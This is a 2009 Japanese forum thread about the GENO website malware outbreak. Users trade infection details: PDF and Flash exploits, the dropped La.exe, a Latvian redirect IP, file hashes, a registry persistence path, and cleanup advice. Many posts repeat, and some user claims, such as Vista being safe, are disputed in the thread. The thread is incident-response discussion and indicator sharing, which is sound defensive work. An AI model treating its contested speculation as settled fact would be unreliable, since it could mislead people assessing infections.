ウイルスの親玉らしきものは検体採取済みでセキュ板内の可否スレの
住民が各ベンダーに検体提出してるみたいだし
・ウイルスの動作
・ウイルスの親玉(まだちょっと?)
・ウイルスの被害
・駆除方法
・今後の対策
・感染していないか確認する方法
ウイルスの親玉らしきものは検体採取済みでセキュ板内の可否スレの
住民が各ベンダーに検体提出してるみたいだし
378 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:49:37
とにかく ,lv ドメインを
ルーターやファイヤーウォールなどで
イン・アウトバウンドともに弾くこと、発症したら何があるかわからん
ルーターやファイヤーウォールなどで
イン・アウトバウンドともに弾くこと、発症したら何があるかわからん
379 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:51:57
ウイルス自体は結構厄介だけど感染経路は別によくあるパターンだろ
特にFlashの脆弱性含め、Adobe Collab overflowなんて珍しくもなんともない気がするんだけど
これだけ感染広まってるって事はそれだけセキュリティに無頓着なやつが多いんだろうな
このウイルスで初めてpdfでもウイルスに感染すること知ったやついるだろ
今は逆に仮想PCでネットするしかないとか言い始めてるやつも要るけど・・・
特にFlashの脆弱性含め、Adobe Collab overflowなんて珍しくもなんともない気がするんだけど
これだけ感染広まってるって事はそれだけセキュリティに無頓着なやつが多いんだろうな
このウイルスで初めてpdfでもウイルスに感染すること知ったやついるだろ
今は逆に仮想PCでネットするしかないとか言い始めてるやつも要るけど・・・
380 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:56:20
でっていう
381 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:58:01
382 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:59:11
サイトが乗っ取られるのが一番悪い
383 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:01:29
たいした情報じゃないけど
sqlsodbc.chm
は改変されるんじゃなくて上書きされる
sqlsodbc.chm
は改変されるんじゃなくて上書きされる
384 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:04:36
PDFとFlashのエクスプロイトコードはアンチウイルスソフトで引っかかるの?
385 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:05:56
Readerのバージョンにふれてる人、マイナーバージョンまで書いてほしいな。
バージョン7、8に関しては脆弱性に対応するアップデート(7.1.1、8.1.4)があるはず。
バージョン9も最新の9.1.0でないとダメなわけだから。
バージョン7、8に関しては脆弱性に対応するアップデート(7.1.1、8.1.4)があるはず。
バージョン9も最新の9.1.0でないとダメなわけだから。
386 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:08:46
会社の感染したPCで sqlsodbc.chm のMD5調べたら
F639AFDE02547603A3D3930EE4BF8C12
ではなかった\(^o^)/
さて感染日時と感染経路を調べてみますわ
F639AFDE02547603A3D3930EE4BF8C12
ではなかった\(^o^)/
さて感染日時と感染経路を調べてみますわ
387 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:09:38
388 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:10:11
結局、一般で被害受けてるのはみんなXPなん?
俺はPDFとFlashを未対策のままVista+先生で
短縮ふんじゃったけど、特に何もおかしな挙動は
起きてないんだが・・・・。
俺はPDFとFlashを未対策のままVista+先生で
短縮ふんじゃったけど、特に何もおかしな挙動は
起きてないんだが・・・・。
389 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:10:11
GIZMODE Japan (ギズモードジャパン)GIZMODE japan
ttp://gizmode.blog26.fc2.com/blog-entry-212.html
GENOウイルス情報
4日〜7日までの間にPCショップGENOを観覧された方は
ウイルス感染の可能性があります。
サイトを開くだけでウイルスに感染する凶悪なタイプで
現在、大騒ぎになっております。
心当たりのある方は GENOウイルス被害者の会
で、情報交換しておりますので是非ご覧ください。
ttp://gizmode.blog26.fc2.com/blog-entry-212.html
GENOウイルス情報
4日〜7日までの間にPCショップGENOを観覧された方は
ウイルス感染の可能性があります。
サイトを開くだけでウイルスに感染する凶悪なタイプで
現在、大騒ぎになっております。
心当たりのある方は GENOウイルス被害者の会
で、情報交換しておりますので是非ご覧ください。
390 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:11:51
>>384
検体を入手できてないからわからんが
http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js
でpdfの解析結果は出てる
検体を入手できてないからわからんが
http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js
でpdfの解析結果は出てる
391 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:14:06
んで何、今GENOは何食わぬ顔で営業したりしてやがってくれちゃったりするわけ?
392 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:15:13
>>390
サンクス
そのMD5でVirusTotalあさってみた
今はもう少し増えていることを願いたい
ttp://www.virustotal.com/analisis/d6a2671a52eac304390d5b6ec241cc21
サンクス
そのMD5でVirusTotalあさってみた
今はもう少し増えていることを願いたい
ttp://www.virustotal.com/analisis/d6a2671a52eac304390d5b6ec241cc21
393 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:16:32
>>391
アンチウイルスソフトがバカ売れでウハウハらしい
アンチウイルスソフトがバカ売れでウハウハらしい
394 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:16:40
AMDのCPU使ってても32bit版で動かしてたらx86だろw
AMD64なら大丈夫ってのは64Bit版って事だろ
AMD64なら大丈夫ってのは64Bit版って事だろ
395 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:19:19
>>388
感染の可能性がある人
・Windows XP以下(SPでも)
・ブラウザで IE/Fx/Sf/Op/GC を使用
・Adobe Reader(Ver 9.1未満)
・Adobe Flash(Ver n.m以下)
感染の可能性が低い(または無い)人
・Windows Vista
・JavaScriptをオフにしている
・Adobe Reader未インストール
・Adobe Reader互換のPDF Readerだけインストールしてある
・スタンドアロン
・sqlsodbc.chmのmd5値が [f639afde02547603a3d3930ee4bf8c12] >101
詳細情報
>336
上記はほぼコピペ
ReaderやFlashの脆弱バージョンについては
ここのスレの奴がかなり詳しいだろうから頼んます
感染の可能性がある人
・Windows XP以下(SPでも)
・ブラウザで IE/Fx/Sf/Op/GC を使用
・Adobe Reader(Ver 9.1未満)
・Adobe Flash(Ver n.m以下)
感染の可能性が低い(または無い)人
・Windows Vista
・JavaScriptをオフにしている
・Adobe Reader未インストール
・Adobe Reader互換のPDF Readerだけインストールしてある
・スタンドアロン
・sqlsodbc.chmのmd5値が [f639afde02547603a3d3930ee4bf8c12] >101
詳細情報
>336
上記はほぼコピペ
ReaderやFlashの脆弱バージョンについては
ここのスレの奴がかなり詳しいだろうから頼んます
396 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:19:22
あ、394はOSの話ね
64Bitだから感染しないって理由も無い気がするが。
64Bitだから感染しないって理由も無い気がするが。
397 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:24:36
親玉らしきファイルが
bxatg.mnn
カスペによると無害だそうだ。
ますます迷宮入り?
bxatg.mnn
カスペによると無害だそうだ。
ますます迷宮入り?
398 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:25:22
vistaだけど、そもそもsqlsodbc.chmが無い
399 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:28:21
PCの操作ログたどっていったら %WINDIR%\~.exe が生成されてて C:\_.bat にリネームされてたわw
直前にAdobe Readerが起動してるんでPDFの脆弱性付かれたっぽい。
直前にAdobe Readerが起動してるんでPDFの脆弱性付かれたっぽい。
400 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:29:58
401 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:31:03
402 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:34:46
>>54をみるとFlashPlayerのほうは9.0.124未満狙いのようだが
それ以降が安全とも限らんのか
それ以降が安全とも限らんのか
403 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:38:52
a-squaredてアンチマルウェアの方?無印?
404 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:41:43
405 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:44:46
ノートンとバスターは2月に既に対応してたのか。やるじゃん
406 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:52:52
うちのVistaではsqlsodbc.chmはc:\windows\help\mui\0411にあった
407 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:56:03
408 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:57:11
今はどんな状況?
GENO以外のサイトにも拡散してるとか聞いたけど
GENO以外のサイトにも拡散してるとか聞いたけど
409 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:58:01
わしの超漢字は絶好調
410 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:58:16
411 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:59:47
412 : ◆W07s5cWHb. :2009/04/09(木) 12:05:38
>>407
うちはノートン先生を毎日最新定義ファイルで動かしてるけど、
当初はLa.exeも未対応で検出しなかったし、
そもそも感染状態のGenoサイトを踏んでもまったく反応しなかったよ。
結局、Acrobatの脆弱性を突いたウィルスが沢山あって、
今回のウィルスもその一つで、
元々どこのセキュリティソフトメーカーにも対処されていなかっただけって話だよ。
うちはノートン先生を毎日最新定義ファイルで動かしてるけど、
当初はLa.exeも未対応で検出しなかったし、
そもそも感染状態のGenoサイトを踏んでもまったく反応しなかったよ。
結局、Acrobatの脆弱性を突いたウィルスが沢山あって、
今回のウィルスもその一つで、
元々どこのセキュリティソフトメーカーにも対処されていなかっただけって話だよ。
413 : ◆W07s5cWHb. :2009/04/09(木) 12:08:48
補足だけど、ノートン先生は既に現行最新の定義ファイルに更新すれば
ちゃんと検知してくれて
Javascriptを改ざんされていてラトビアに飛ばされるサイトを踏んでも
感染を未然に防ぐ。
てか、これはノートン先生以外でも恐らく同程度の対処は既に行われている筈。
ちゃんと検知してくれて
Javascriptを改ざんされていてラトビアに飛ばされるサイトを踏んでも
感染を未然に防ぐ。
てか、これはノートン先生以外でも恐らく同程度の対処は既に行われている筈。
414 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:10:41
既にウイルス入られてる人は先生もカスペも無反応って言ってたけど
あれ改善されたのかな?
あれ改善されたのかな?
415 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:12:50
山田チェッカーみたいに、感染してるか否か検査できるツールがあれば便利なのにね
416 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:15:16
>>363
Adobe Reader 7のバージョンは7.10?
Adobe Reader 7のバージョンは7.10?
417 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:17:24
sqlsodbc.HLPとsqlsodbc.GIDはあるけど
sqlsodbc.chmのファイル自体がない。
GIDの更新日時が今日になってるのが気になるんだけど
まさか拡張子偽装まではしないよね?
sqlsodbc.chmのファイル自体がない。
GIDの更新日時が今日になってるのが気になるんだけど
まさか拡張子偽装まではしないよね?
418 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:22:02
パソコン一般の方に一人親玉らしき献体持ってる奴いたな
そいつのはVTで反応してたんだけど
そいつのはVTで反応してたんだけど
419 : ◆W07s5cWHb. :2009/04/09(木) 12:23:02
>>414
少なくてもPC上に保存されていたla.exeに関しては
ノートン先生はZIP内のものも、UPX圧縮を解除したものに関しても即効で検知して
ぶっとばしてくれた。
恐らく他のセキュリティソフトも同様だと思う。
ただ、あんたはなにもわかってないみたいだから一言言うけど
ウィルスを食らった後の場合はそもそもセキュリティソフトで検知して駆除したから安心なんて話じゃなくて
原理原則的に可及的速やかにクリーンインストールかリカバリしないと駄目だよ。絶対に。
少なくてもPC上に保存されていたla.exeに関しては
ノートン先生はZIP内のものも、UPX圧縮を解除したものに関しても即効で検知して
ぶっとばしてくれた。
恐らく他のセキュリティソフトも同様だと思う。
ただ、あんたはなにもわかってないみたいだから一言言うけど
ウィルスを食らった後の場合はそもそもセキュリティソフトで検知して駆除したから安心なんて話じゃなくて
原理原則的に可及的速やかにクリーンインストールかリカバリしないと駄目だよ。絶対に。
420 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:27:37
jsファイルは大体各ベンダー対応してるみたいだし
今後感染心配してる奴はAVアップデートすればいいと思う
で問題が感染後にドロップするファイルでこのドロップするファイルの採取が難しくて
未だにAVは役立たずという状態
今後感染心配してる奴はAVアップデートすればいいと思う
で問題が感染後にドロップするファイルでこのドロップするファイルの採取が難しくて
未だにAVは役立たずという状態
421 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:28:49
>>412-413
973 名前: オステオスペルマム(dion軍)[] 投稿日:2009/04/09(木) 11:35:08.65 ID:jWIkg7dG
思い出スレになってんだろうと思って見に来たけどどうなってんだ。
収束してないどころかまだ拡散中?
982 名前: マンサク(大阪府)[] 投稿日:2009/04/09(木) 11:54:31.16 ID:g6SEJUpr
>>973
ウイルス仕込まれてるサイトが拡大してる。
セキュ板解析班がウイルスの親玉らしきファイルを特定したが
各ベンダーのアンチウイルスではスルー。
【結論】
何一つ解決してない。
973 名前: オステオスペルマム(dion軍)[] 投稿日:2009/04/09(木) 11:35:08.65 ID:jWIkg7dG
思い出スレになってんだろうと思って見に来たけどどうなってんだ。
収束してないどころかまだ拡散中?
982 名前: マンサク(大阪府)[] 投稿日:2009/04/09(木) 11:54:31.16 ID:g6SEJUpr
>>973
ウイルス仕込まれてるサイトが拡大してる。
セキュ板解析班がウイルスの親玉らしきファイルを特定したが
各ベンダーのアンチウイルスではスルー。
【結論】
何一つ解決してない。
422 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:29:02
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
423 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:29:35
la.exeは結局
HKLM\?SOFTWARE\?Microsoft\?Windows NT\?CurrentVersion\?Drivers32\aux
にドライバ登録して、それが再起動時になんかやってんだよね?
何やってんのかわかる人いない?
HKLM\?SOFTWARE\?Microsoft\?Windows NT\?CurrentVersion\?Drivers32\aux
にドライバ登録して、それが再起動時になんかやってんだよね?
何やってんのかわかる人いない?
424 : ◆W07s5cWHb. :2009/04/09(木) 12:32:42
425 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:33:52
アクロバットは使って無くてFoxit Reader使ってるんですが
Versionは先月以降更新されてないようです。
このままでは危ないですか?
Foxit Reader 3.0 Build 1506 03/09/09
Versionは先月以降更新されてないようです。
このままでは危ないですか?
Foxit Reader 3.0 Build 1506 03/09/09
427 : ◆W07s5cWHb. :2009/04/09(木) 12:37:18
>>423
その辺はla.exeを逆アセンブルしてソースを解読して
La.exeの処理内容を把握しないと駄目なんだけど、
このスレには残念ながら現状ではその種のスキルがある奴がいないんだと思う。
プログラマ板から有能なプログラマを召還して解析しないとだめかもしらんね。
その辺はla.exeを逆アセンブルしてソースを解読して
La.exeの処理内容を把握しないと駄目なんだけど、
このスレには残念ながら現状ではその種のスキルがある奴がいないんだと思う。
プログラマ板から有能なプログラマを召還して解析しないとだめかもしらんね。
428 : ◆W07s5cWHb. :2009/04/09(木) 12:38:43
429 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:43:32
親玉を引っ張り出すところまでしかわかってなくて、
親玉が何をするかは一切不明なんだよね 今のところ。
ただ、ブラウザが落ちまくったりとかの症状しかあがってない。
親玉が何をするかは一切不明なんだよね 今のところ。
ただ、ブラウザが落ちまくったりとかの症状しかあがってない。
430 :414:2009/04/09(木) 12:44:14
下手に出れば調子に乗りやがって
いい加減巣に帰れゴミカス
いい加減巣に帰れゴミカス
431 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:46:16
>>430
勝手に俺を名乗るなw
勝手に俺を名乗るなw
432 : ◆W07s5cWHb. :2009/04/09(木) 12:49:06
433 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:49:07
こえ〜
リカバリでWin回復しても、データなかったら意味ない
今回はセキュリティソフトの完敗か
リカバリでWin回復しても、データなかったら意味ない
今回はセキュリティソフトの完敗か
434 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:49:29
ウイルス解析よりもウイルスを各ベンダーに送って対応してもらうのが先
それとLa.EXEが引き金で感染したやつはいないだろ?
これはまた別URL(同じラトビアIP)から
ダウンロードしたものであって今回のGENO騒動とはノータッチの筈
ホームページ経由の感染に絞って解析を進めるべき
それとLa.EXEが引き金で感染したやつはいないだろ?
これはまた別URL(同じラトビアIP)から
ダウンロードしたものであって今回のGENO騒動とはノータッチの筈
ホームページ経由の感染に絞って解析を進めるべき
435 : ◆W07s5cWHb. :2009/04/09(木) 12:55:00
>>434
それならあとは大方出尽くして鯖側の感染経路の特定位しか残ってないと思うけど、
そのへんになるとそれこそ囮鯖でも立ててクラッカーにクラッキングして貰う位しか残ってないと思うよ。
結局、FTPパスが何らかの方法で事前に漏れて、FTPで直に鯖にログインされて堂々と改ざんされているって説が
全世界的に有力になってるけど、
それの裏づけ作業みたいな感じのをまだ誰もやっていないんで、それをやるとか。
ちなみに検体提出なんてとっくに済んでるでしょ。
それならあとは大方出尽くして鯖側の感染経路の特定位しか残ってないと思うけど、
そのへんになるとそれこそ囮鯖でも立ててクラッカーにクラッキングして貰う位しか残ってないと思うよ。
結局、FTPパスが何らかの方法で事前に漏れて、FTPで直に鯖にログインされて堂々と改ざんされているって説が
全世界的に有力になってるけど、
それの裏づけ作業みたいな感じのをまだ誰もやっていないんで、それをやるとか。
ちなみに検体提出なんてとっくに済んでるでしょ。
436 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:55:26
437 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:00:24
ちなみに今回のが2000/XP狙いうちでVISTAは大丈夫ってのは
どういう根拠なん?
どういう根拠なん?
438 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:01:27
439 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:02:51
>>436
だからGENOその他汚染されたサイトで感染する今回のウイルス侵入経路でLa.exeなんてものは少しも絡んでない。
GENOのサイトをみてPDF又はFLASHのExploitで感染→La.exeが作られる
なら解るがここでいってるLa.exeは別URLの物だろ?
だからGENOその他汚染されたサイトで感染する今回のウイルス侵入経路でLa.exeなんてものは少しも絡んでない。
GENOのサイトをみてPDF又はFLASHのExploitで感染→La.exeが作られる
なら解るがここでいってるLa.exeは別URLの物だろ?
440 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:03:02
よくいくFLA板は今すげぇ過疎ってるのにID出てるんだよなぁ…。
昔は盛り上がってたからだろうけどね。
昔は盛り上がってたからだろうけどね。
441 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:04:47
442 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:06:01
443 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:06:19
444 : ◆W07s5cWHb. :2009/04/09(木) 13:07:11
>>437
ウィルス内の処理の一部でUserAgentを参照して
2kやXPのみを対象にしていた点と>>137の点。
ただ、VistaでもUAを詐称して踏んだ場合とか、
UA詐称をしない場合でもウィルスをモロに食らう形ではなくても部分的に食らってしまう事はあるかと思う。
いずれにしてもUACをどこまで信用するかって話になる。
個人的にはDEPもUACも過信するほど強固ではないと思うよ。
ウィルス内の処理の一部でUserAgentを参照して
2kやXPのみを対象にしていた点と>>137の点。
ただ、VistaでもUAを詐称して踏んだ場合とか、
UA詐称をしない場合でもウィルスをモロに食らう形ではなくても部分的に食らってしまう事はあるかと思う。
いずれにしてもUACをどこまで信用するかって話になる。
個人的にはDEPもUACも過信するほど強固ではないと思うよ。
445 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:11:30
La.exeとGENO経由の感染、解析レポートがごっちゃになりそうだから
ホームページ経由の感染を解析したほうが滅茶苦茶にならないと思ったんだけど
La.exeがホームページ経由の感染タイプと全く同じとは現段階では言い切れないから
ホームページ経由の感染を解析したほうが滅茶苦茶にならないと思ったんだけど
La.exeがホームページ経由の感染タイプと全く同じとは現段階では言い切れないから
446 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:12:09
バッファオーバーランを起こせるなら、La.exeみたいな実行ファイルをどこかに残す必要はないんじゃないかと思うんだが。
一番の問題はサイトのjsをあっさり書き換えられてるってことじゃないか。
一番の問題はサイトのjsをあっさり書き換えられてるってことじゃないか。
447 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:14:08
うわあ・・・
特別な動作するときに逐一許可してくれるうざいやつでしょ
VISTAの高速化設定とかで本やサイト見てUAC切ってた・・・
というユーザー多いんじゃ
特別な動作するときに逐一許可してくれるうざいやつでしょ
VISTAの高速化設定とかで本やサイト見てUAC切ってた・・・
というユーザー多いんじゃ
448 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:16:45
449 : ◆W07s5cWHb. :2009/04/09(木) 13:17:45
>>447
UACを切ってた場合もそうだし、
そもそもHDD上のファイル書き換えではなくて
メモリ上のExplorer.exeを書き換えて悪さをしているみたいなんだから
そこでなにかやられたらそれこそアウト。
ぶっちゃけ、たとえVistaでUACを入れててもも
レジストリを下手に書き換えられたりした時点で負けってレベル。
UACを切ってた場合もそうだし、
そもそもHDD上のファイル書き換えではなくて
メモリ上のExplorer.exeを書き換えて悪さをしているみたいなんだから
そこでなにかやられたらそれこそアウト。
ぶっちゃけ、たとえVistaでUACを入れててもも
レジストリを下手に書き換えられたりした時点で負けってレベル。
450 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:17:55
>>448
そのソースは?
そのソースは?
451 : ◆W07s5cWHb. :2009/04/09(木) 13:20:15
452 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:22:31
ttp://www.dynamicdrive.com/forums/archive/index.php/t-43390.html
ttp://forums.powweb.com/showthread.php?t=82104
これかな
ttp://forums.powweb.com/showthread.php?t=82104
これかな
453 : ◆W07s5cWHb. :2009/04/09(木) 13:25:07
>>446
これ以上のサイト側の感染を抑止する為にはその部分の調査も必要だけど、
ホントはそんな解析をプロの業者にやらせたら軽く1000万位取られても当然ってレベルだよなw
いずれにしてもこれまでに感染が確認されたサイトが稼動しているOS、httpd、CMSがそれぞれバラバラなんで、
単純にこれらのセキュリティホールが突かれているっていう単純な話ではない様な気がする。
これ以上のサイト側の感染を抑止する為にはその部分の調査も必要だけど、
ホントはそんな解析をプロの業者にやらせたら軽く1000万位取られても当然ってレベルだよなw
いずれにしてもこれまでに感染が確認されたサイトが稼動しているOS、httpd、CMSがそれぞれバラバラなんで、
単純にこれらのセキュリティホールが突かれているっていう単純な話ではない様な気がする。
454 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:25:31
>>449
VISTAは大勝負ってのは大ウソか
VISTAは大勝負ってのは大ウソか
455 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:26:00
456 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:26:50
>404
ただしハードウエアの環境によっては、ウイルスプログラムが実行されずに、
Adobe Readerが強制終了させられるだけの場合もあるという。
これがAMD64の事かな?
ただしハードウエアの環境によっては、ウイルスプログラムが実行されずに、
Adobe Readerが強制終了させられるだけの場合もあるという。
これがAMD64の事かな?
457 : ◆W07s5cWHb. :2009/04/09(木) 13:29:05
458 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:33:30
UACってあれか、コンパネいじくってるとよく出てくる「許可くれよ」ってやつか
あれを切って、許可する手間が省ける以外にメリットあんの?
あれを切って、許可する手間が省ける以外にメリットあんの?
459 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:33:47
>>439
?id=2の変造PDFによるバッファオーバーフローで?id=10のexeがダウンロード・実行させる
その1つが通称La.exe
?id=10で落ちてくるexeは数種類あるようだ
時間とともに差し替えられたのか、何らかの条件に基づいて選ばれるのか、はたまた
ランダムなのかは不明
いわゆるLa.exe(15872 bytes)
6de7f96fe398ca304b1992869faf55c7
いわゆる8lv.exe(15360 bytes)【実物は未確認】
791509d03706cbc8883536b5131341d4
さらに別のexe(16384 bytes)
2586a42cfdc03ea62694f5641b5d7633
また、?id=3のFlash(swf)もバッファオーバーフローを引き起こす変造ファイルだと
思われるが詳細不明
?id=2の変造PDFによるバッファオーバーフローで?id=10のexeがダウンロード・実行させる
その1つが通称La.exe
?id=10で落ちてくるexeは数種類あるようだ
時間とともに差し替えられたのか、何らかの条件に基づいて選ばれるのか、はたまた
ランダムなのかは不明
いわゆるLa.exe(15872 bytes)
6de7f96fe398ca304b1992869faf55c7
いわゆる8lv.exe(15360 bytes)【実物は未確認】
791509d03706cbc8883536b5131341d4
さらに別のexe(16384 bytes)
2586a42cfdc03ea62694f5641b5d7633
また、?id=3のFlash(swf)もバッファオーバーフローを引き起こす変造ファイルだと
思われるが詳細不明
460 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:34:26
カスペのオンラインが薦められてるけどノートンのオンラインスキャンでも検知してくれますか?
461 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:35:22
UAC嫌でVISTA使う意味が分からん
462 : ◆W07s5cWHb. :2009/04/09(木) 13:37:38
>>459
補足すると、それらのEXEに共通するのは皆u.batを生成するって点だよね。
>>439さんは既存の海外のウィルス情報に全然目を通していないみたいだけど、
もうちょっと勉強したほうがいいと思う。
補足すると、それらのEXEに共通するのは皆u.batを生成するって点だよね。
>>439さんは既存の海外のウィルス情報に全然目を通していないみたいだけど、
もうちょっと勉強したほうがいいと思う。
463 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:37:41
464 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:39:19
XPの制限ユーザーでもGENOにやられますか?
465 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:41:14
466 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:42:16
よし、今から俺が初心者質問対応係になるよ
ただし、今から寝る。いつ起きるかもわからん。
ただし、今から寝る。いつ起きるかもわからん。
467 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:43:56
>>452
英語力なさすぎて嘆いてるのか本気で言ってるのか読めない
英語力なさすぎて嘆いてるのか本気で言ってるのか読めない
468 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:45:01
頭が禿げてきたんだけどこれなにウィルス?
469 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:46:14
HAGENOウイルス
470 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:46:48
>>460
対応は遅かったけど、今は先生でもOK
対応は遅かったけど、今は先生でもOK
471 : ◆W07s5cWHb. :2009/04/09(木) 13:47:11
473 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:51:11
>>471
水虫かよ。
水虫かよ。
474 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:52:28
VB2009が蹴ったアドレス、末尾が?id=101だった。
この末尾の数字が違うと、落ちてくるウイルスも違うってことかな?
この末尾の数字が違うと、落ちてくるウイルスも違うってことかな?
475 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:54:32
476 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:01:44
まぁ自業自得だな
いまだにXP使ってるからこういうことになる VISTAなら大丈夫
VISTA SP1 Mozilla Firefox
Adobe Reader 9 flash プレーヤー10
が最強
いまだにXP使ってるからこういうことになる VISTAなら大丈夫
VISTA SP1 Mozilla Firefox
Adobe Reader 9 flash プレーヤー10
が最強
477 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:06:36
笑ってあげたほうがいいかな?
わし的には失笑なんだが
わし的には失笑なんだが
478 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:08:04
>>477
海外では3月28日の報告があるみたいだ。
海外では3月28日の報告があるみたいだ。
479 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:17:39
高校入学祝いにやっと買ってもらってPCがVISTA機で
中学時代にXP機買ってもらってるツレに相手にされない
香具師がうるさいスレはここですか
中学時代にXP機買ってもらってるツレに相手にされない
香具師がうるさいスレはここですか
480 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:26:50
481 : ◆W07s5cWHb. :2009/04/09(木) 14:28:08
ラトビアのIPの94.247.2.195でぐぐると
↓の公開DBがヒットしたわ。
これを見た限り、少なくても3/25の段階で
ラトビアのIPに関してチェックしようとしている人がいたんで、
クラッカーがウィルスの動作チェック等に使ったのか
サイトを書き換えられてしまったWebマスター等が確認の為に使ってた痕跡だと思う。
VisualRoute Database Reporting
ttp://visualroute.visualware.com/search?dfromtext=
2009%2F03%2F24+19%3A55.56&dtotext=2009%2F03%2F25+19%3A55.56&pg=21&perpg=50
※URL長すぎなんて改行してます。。。
ぐーぐる先生の日本語訳
ttp://translate.google.co.jp/translate?hl=ja&sl=en&u=http://visualroute.visualware.com/
search%3Fdfromtext%3D2009%252F03%252F24%2B19%253A55.56%26dtotext
%3D2009%252F03%252F25%2B19%253A55.56%26pg%3D21%26perpg%3D50&ei=
ioXdSfbEB8yNkAX2l9ybDg&sa=X&oi=translate&resnum=1&ct=result&prev=
/search%3Fq%3D94.247.2.195%26hl%3Dja%26lr%3D%26sa%3DN%26start%3D60
※URL長すぎなんて改行してます。。。
↓の公開DBがヒットしたわ。
これを見た限り、少なくても3/25の段階で
ラトビアのIPに関してチェックしようとしている人がいたんで、
クラッカーがウィルスの動作チェック等に使ったのか
サイトを書き換えられてしまったWebマスター等が確認の為に使ってた痕跡だと思う。
VisualRoute Database Reporting
ttp://visualroute.visualware.com/search?dfromtext=
2009%2F03%2F24+19%3A55.56&dtotext=2009%2F03%2F25+19%3A55.56&pg=21&perpg=50
※URL長すぎなんて改行してます。。。
ぐーぐる先生の日本語訳
ttp://translate.google.co.jp/translate?hl=ja&sl=en&u=http://visualroute.visualware.com/
search%3Fdfromtext%3D2009%252F03%252F24%2B19%253A55.56%26dtotext
%3D2009%252F03%252F25%2B19%253A55.56%26pg%3D21%26perpg%3D50&ei=
ioXdSfbEB8yNkAX2l9ybDg&sa=X&oi=translate&resnum=1&ct=result&prev=
/search%3Fq%3D94.247.2.195%26hl%3Dja%26lr%3D%26sa%3DN%26start%3D60
※URL長すぎなんて改行してます。。。
